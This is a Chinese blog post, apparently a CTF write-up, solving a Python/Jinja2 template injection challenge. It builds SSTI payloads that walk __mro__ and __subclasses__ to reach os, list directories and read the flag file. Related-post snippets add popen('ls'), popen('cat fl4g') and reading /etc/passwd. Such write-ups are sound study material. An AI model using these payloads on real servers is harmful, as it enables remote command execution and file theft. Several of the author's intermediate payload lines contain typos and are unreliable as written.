攻防世界——web题Web_python_template_injection

原创 于 2025-05-13 15:54:56 发布 · 684 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

以前对于python的模板注入了解得并不很细致,基本就是用别人的payload,希望借此一篇来丰富一下。

一、前期了解

几个方法:
__class__   返回创建该对象的类

__base__ 返回该对象所继承的第一个父类

__subclasses__ 返回当前类的所有直接子类的列表

__mro__  当要去找子类继承的是哪个父类的方法时(父类可能有同名方法),确定方法的调用路径

__init__ 类的初始化方法

__globals__ 返回函数或方法所在模块的全局命名空间字典

二、题解

1.找到父类

首先可以直接确定模板注入的地方

最终我们的目的是得到flag,需要去寻找有关读取文件和命令执行的类方法

' '  一个空字符串对象

' '.__class__    返回字符串对象的类,即str

' '.__class__.__mro__     返回的是str的方法解析顺序列表,查找路径为 str object(所有类的基类)

 

而至于为什么不用base基类,因为base只能得到第一个直接父类,得不到更全的object类,如下:

' '  一个空字符串对象

' '.__class__ 返回字符串对象的类,即str

' '.__class__.__mro__  返回的是str的方法解析顺序列表,查找路径为 str object(所有类的基类)

# 要用的是object,通过其与subclasses可以尝试找到我们要的方法类

' '.__class__.mro__[2].__subclasses__() 得到object类所有直接子类的列表

在这里的元类type中找到我们要的方法类,记下其对应的位置

2.找到方法类

可以通过crtl + F 来显示是第几个type/位置

这里的 type file可以进行文件读取,处于第40个位置

这里的 site._Printer 可以用于帮助确定全局环境,处于第71个位置

' '  一个空字符串对象

' '.__class__ 返回字符串对象的类,即str

' '.__class__.__mro__  返回的是str的方法解析顺序列表,查找路径为 str object(所有类的基类)

# 要用的是object,通过其与subclasses可以尝试找到我们要的方法类

' '.__class__.mro__[2].__subclasses__() 得到object类所有直接子类的列表

' '.__class__.mro[2].__subclasse__()[71].__init__   是_Printer类的初始化构造函数

' '.__class__.mro[2].__subclasse__()[71].__init__.__globals__ 指向该函数定义时的全局命名空间(即site模块的全局命令空间,而site模块在启用时回导入许多核心模块,如os,sys等)

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.') 输出当前目录下的文件

找到fl4g,随后进行文件内容读取

 成功得到flag

c30%00
关注
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6685
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1340
好难啊
攻防世界Web_python_template_injection
weixin_52268949的博客
02-08 943
Web_python_template_injection 根据目意思有点像python的ssti模板注入 我们来测试一下 果真存在那么我们就用ssti的基本方法了 我们先来看看全局变量 我们先来寻找一下基类 http://111.200.241.244:62377/{{''.__class__.__mro__}} 在这里发现了object类 寻找<type ‘object’>类的所有子类中可用的引用类 http://111.200.241.244:62377/{{''.__cla
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2680
攻防世界python模板注入
攻防世界Web_python_template_injection
2302_79800344的博客
04-01 1595
【代码】【攻防世界Web_python_template_injection
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3440
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界web第十Web_python_template_injection
最新发布
ren186的博客
12-31 366
攻防世界web第十Web_python_template_injection
攻防世界 web高手进阶区 9分 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1190
继续ctf的旅程,开始攻防世界web高手进阶区的9分,本文是Web_python_flask_sql_injection的writeup
攻防世界 web进阶区 Web_python_template_injection
m0_51395584的博客
06-17 1183
攻防世界 web进阶区 Web_python_template_injection python的flask模板漏洞利用,本人对这个模板也不是很熟悉,大家将就看吧。
攻防世界 Web_python_template_injection(flask模版注入)
weixin_73399382的博客
07-06 1522
通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)SSTI与这个方法密不可分。
攻防世界Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 2124
考点为模板漏洞及其利用。
攻防世界25-Web_python_template_injection-CTFWeb
LH1013886337的博客
10-16 801
首先,目告诉我们这是一个 python 注入问,思考怎样用 python 语句获取控制台权限:想到了。包裹的内容当做变量解析替换,所以当我们传入。python模板注入,其实就是ssti,举例,Jinja2 在渲染的时候会把。,这下我们就可以随便用控制台输出了。, 我们想要的是内容,所所以选择。类,它在列表的第七十二位, 即。时,表达式就会被渲染器执行。从其中可以找到我们想要 的。), 这两句前者返回。
web python template injection_攻防世界WEB高手进阶之python_template_injection
weixin_39705193的博客
12-10 173
python模板注入看了一堆文章,也不是看的很明白,反而把目做出来了大概思路如下简单探测返回说明服务器执行了{{}}里面这一段代码利用{{ config.items() }}可以查看服务器的配置信息读取passwd信息{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}执行成功Python3代码执行下面这一段...
攻防世界--Web_python_template_injection
m0_67467924的博客
05-29 363
查看文件内容:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()4.构造payload查看当前目录文件,''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()1.获取基本类:''.__class__.__mro__运行成功,证明存在模板注入。
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 665
有关python模板注入漏洞的学习
攻防世界 - Web - Level 2 | Web_python_template_injection
Blue17 の 小窝
12-30 696
那么下面就简单了,就是 SSTI 的流程。因为 Python 所有类的基类都是 Object(Flask 框架是 Python 的哦),所以 SSTI 实际上就是通过数据类型的父类找到 Object 类,然后再找到 Object 类衍生出来的可以执行文件读取或者命令执行的函数(有点抽象,可以去看看上面提供的参考文章,自己做个推导就好)。上面那个 Payload 定位到了 Object 类下的所有子类,那么下面我们就要去实例化这些类并且通过。既然是考察的 SSTI,我们就得首先找到可注入的点,输入。
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1146
步骤 打开所给场景,根据所给提示是python的模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
攻防世界web_python_template_injection
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意操作,例如读取文件、执行命令等。为了防止这种漏洞,开发人员应该对输入进行严格的过滤和验证,以确保输入不包含任何恶意代码。同时,使用最新版本的Python模板引擎和Web框架也可以帮助减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值